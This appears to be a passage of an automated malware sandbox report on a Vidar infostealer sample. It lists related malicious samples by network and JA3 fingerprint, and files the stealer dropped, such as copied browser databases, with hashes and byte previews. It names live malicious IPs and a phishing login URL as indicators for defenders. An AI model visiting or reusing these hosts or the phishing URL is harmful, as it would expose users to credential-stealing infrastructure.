WORLDSTREAMNL	script.ps1	Get hash	malicious	Vidar	Browse	5.252.155.64
	nsharm5.elf	Get hash	malicious	Mirai	Browse	178.132.3.26
	Opdxdyeul.exe	Get hash	malicious	SystemBC	Browse	178.132.2.10
	spc.elf	Get hash	malicious	Unknown	Browse	45.131.4.124
	Xeno Executor.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	5.252.155.28
	file.exe	Get hash	malicious	Amadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, Vidar	Browse	5.252.155.28
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	5.252.155.28
	spc.elf	Get hash	malicious	Mirai	Browse	213.108.199.252
	https://kbprinters.com/serviciodecorreo/login	Get hash	malicious	Unknown	Browse	217.23.10.192
	Payload 94.75.225.exe	Get hash	malicious	Unknown	Browse	194.88.105.30
AKAMAI-ASN1EU	lem.exe	Get hash	malicious	Vidar	Browse	23.209.72.40
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	AiaStwRBdI.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HJVzgKyC0y.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	rUfr2hQGOb.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YhF4vhbnMW.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	B8NcU4mckY.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
MIT-GATEWAYSUS	lem.exe	Get hash	malicious	Vidar	Browse	18.164.116.98
	xd.mips.elf	Get hash	malicious	Mirai	Browse	18.113.234.176
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	19.34.137.22
	xd.x86.elf	Get hash	malicious	Mirai	Browse	18.50.43.230
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	18.114.62.59
	telnet.ppc.elf	Get hash	malicious	Unknown	Browse	18.174.137.24
	telnet.sh4.elf	Get hash	malicious	Unknown	Browse	18.161.102.167
	armv7l.elf	Get hash	malicious	Mirai	Browse	18.9.152.63
	armv4l.elf	Get hash	malicious	Mirai	Browse	18.128.5.115
	https://fsharetv.co/	Get hash	malicious	Unknown	Browse	18.165.220.127

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	yoda.exe	Get hash	malicious	Vidar	Browse	149.154.167.99 188.245.216.205
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99 188.245.216.205
	markiz.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	149.154.167.99 188.245.216.205
	utkin.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	149.154.167.99 188.245.216.205
	script.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99 188.245.216.205
	libcurl.dll	Get hash	malicious	Matanbuchus	Browse	149.154.167.99 188.245.216.205
	b8ygJBG5cb.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	setup.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	installer.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	setup.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\314782\Iceland.com	yoda.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	script.ps1	Get hash	malicious	Vidar	Browse
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse
	vce exam simulator 2.2.1 crackk.exe	Get hash	malicious	LummaC	Browse
	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse
	eMBO6wS1b5.exe	Get hash	malicious	LummaC Stealer	Browse
C:\Users\user\AppData\Local\Temp\314782\A	yoda.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8307305732219922
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqF0
MD5:	667FBB66D37C062F54C3928815F3A54A
SHA1:	1C0F7610799BC144F47BF75A2534A84CDDD76476
SHA-256:	753E88C5F8F867E0C540AB344322A029F5824D27DA96B461B6DED9C2A0651DF6
SHA-512:	CF0480B55E8413F03A2B33847C704FB4A93E344156FCE81CA7B14A3C8EA1A9F45F915640C582E7F3E4C5344AF3945EAA51B1D3C9B72C8D5999F115CCF501E928
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x8ba020ed, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585892494151365
Encrypted:	false
SSDEEP:	1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	8F489C9061C2602205F9A10F88497955
SHA1:	B9E233744335DABD713704371DA523828F2F05B1
SHA-256:	9E8A2A94B15623E347608BEE641A769EAEB982C3B57422579CFCF07D6E9A0D9E
SHA-512:	7C3589E57BE8F75572B4CFB66724A116CF301E0166340E3F3019136ABC6FCDF6C756F0DD441D70B261154009C3B2166D2194FA63D6ABE81161F3EFD1F972299C
Malicious:	false
Preview:	.. .... ...............X\...;...{......................0.z..........{..8....\|).h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................}(K.8....\|)..................V..8....\|)..........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08034856417620123
Encrypted:	false
SSDEEP:	3:5YeqSwkbGuAJkhvekl1Gqds1l/illrekGltll/SPj:5zlPbrxl8mSleJe3l
MD5:	E4A6F36A0FDD57CB3D88DF2CE64A33B9
SHA1:	6E3CFD41A7850A37EB76241AD50DE35585D6A965
SHA-256:	9EE4FEC727C44630C356B82141E529A4944303C679D822A6182D6847D8571D2C
SHA-512:	9B3D389528E47425A6F34E50ED0478CF7A5AA46E1A2FE4022A8D31B1B830684A44871979B8B7764015B12DFDD3921DF28D3A523A2701FAB5770E69F7B7F2C046
Malicious:	false
Preview:	.......................................;...{..8....\|)......{...............{.......{...XL......{...................V..8....\|).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\58GDTJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	4814
Entropy (8bit):	7.909739359753065
Encrypted:	false
SSDEEP:	96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
MD5:	6E6FE97CBC259DB47CD8423141CF35A3
SHA1:	EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
SHA-256:	1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
SHA-512:	9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
Malicious:	false
Preview:	Cr24....t.........0.."0....H.............0.........,.i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.\|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0....H.............0.........]......N..h...A..LY...%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..\|3.....WS2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&....."..}/9y%.......m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8......J5.Z.~....0.Lt\|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

C:\ProgramData\WTR1NG4W47G4\7G4EUK

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\DJMYU3

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\WTR1NG4W47G4\EC2DJWT0H

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\GVS0HV

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2651165425571291
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVum8:Bq+n0JX9ELyKOMq+8y9/Owr
MD5:	4370C9663247B28EEE042C7BD533C4E3
SHA1:	A4A3CF12CABD6F56AB2C1BC79200D449EA4DA4F4
SHA-256:	31B08EA8C5FC5A14E8CD99BEFE26557F83F1BD4AC822D871D572386EAEDA70BE
SHA-512:	6960F6A9C1EC2FC215D35432399D65D1AE85AACB2D02CD3D9C03DF1622027A842A43BE9B0FE3718DDA485AD17A9DEC72ACDA5301DF990C70A0E9AB56DC3400B4
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\JE3OPZ

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\JMYU379ZC

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\LFKX4E

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\LFU3OH

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	4814
Entropy (8bit):	7.909739359753065
Encrypted:	false
SSDEEP:	96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
MD5:	6E6FE97CBC259DB47CD8423141CF35A3
SHA1:	EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
SHA-256:	1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
SHA-512:	9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
Malicious:	false
Preview:	Cr24....t.........0.."0....H.............0.........,.i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.\|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0....H.............0.........]......N..h...A..LY...%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..\|3.....WS2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&....."..}/9y%.......m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8......J5.Z.~....0.Lt\|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

C:\ProgramData\WTR1NG4W47G4\TRQ9ZC

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WTR1NG4W47G4\YCTR16

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08438200565341271
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
MD5:	F7EEE7B0D281E250D1D8E36486F5A2C3
SHA1:	309736A27E794672BD1BDFBAC69B2C6734FC25CE
SHA-256:	378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
SHA-512:	CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\039d0700-1640-4e3a-a3f6-11fcafbf7ce2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44616
Entropy (8bit):	6.095759891225102
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBuQa2YLCyLcGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEy6AJchu3VlXr4CRo1
MD5:	59FD7C9635A445F3D85466B5A8F7E3A2
SHA1:	EB7E1148F0D360901445AEE28EAFFFD666D89108
SHA-256:	5866CB640A70A8CED65CF359FFC4DBBEF143B434D9A5DC0BE15C8C31075D5811
SHA-512:	4BE8CA828BF5D77CF1DD1E01B5F55D45713C01CEC7547DBD88D66BC87CF93C2D095F91DDE5449DDDD0115CD2A6CD449E9BF24728E6401BFBDCC62952BA8F6DC4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\16e8208e-e41f-4e84-9fb9-cceab52985cf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44616
Entropy (8bit):	6.095349541058946
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBuZo2egQKFpcGoup1Xl3jVzXr4z:z/Ps+wsI7ynEy6ABchu3VlXr4CRo1
MD5:	D6934B58D249D649208F3B16565CA63A
SHA1:	53BA6BFA4A19C8BDB7E641E13EA4226180BE1BD2
SHA-256:	CBAF5CE75C7936B3787FE247E198806C4B33C7FAF9C42EE2DA6FC8FB21313B7C
SHA-512:	95ABC3852EA2730478E200078556C7643C392DEB14033535DFD1D414B50BF807278DC4F1B260864DAF74469A79E0EBE5DFE3999499FCFD7BCE8CA25A1B420984
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\259a70b7-c872-4799-b1e6-7d7c05440563.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44624
Entropy (8bit):	6.095145631604925
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBu8fMWrfFkquZcGoup1Xl3jVzXq:z/Ps+wsI7ynEy6Atchu3VlXr4CRo1
MD5:	B9D95C420540C483BFFF6FCA21C2B8F0
SHA1:	AB5548916CF61F2B6AE50A23652807C44BC340E5
SHA-256:	C08BFBFC4BC00A5F2C0505B9C3B779963C80595EAA4CEB0CE1AD099252297306
SHA-512:	0777EACBA134E60B87B4181B0B1DE147B06B0581FA3110DA1EBFDCDDECA846DE6F136B246BEBA6AA81EE8A444B1DFCAF7DF8C0E6FAC78F4425EE2E7E7CD9B866
Malicious:	false
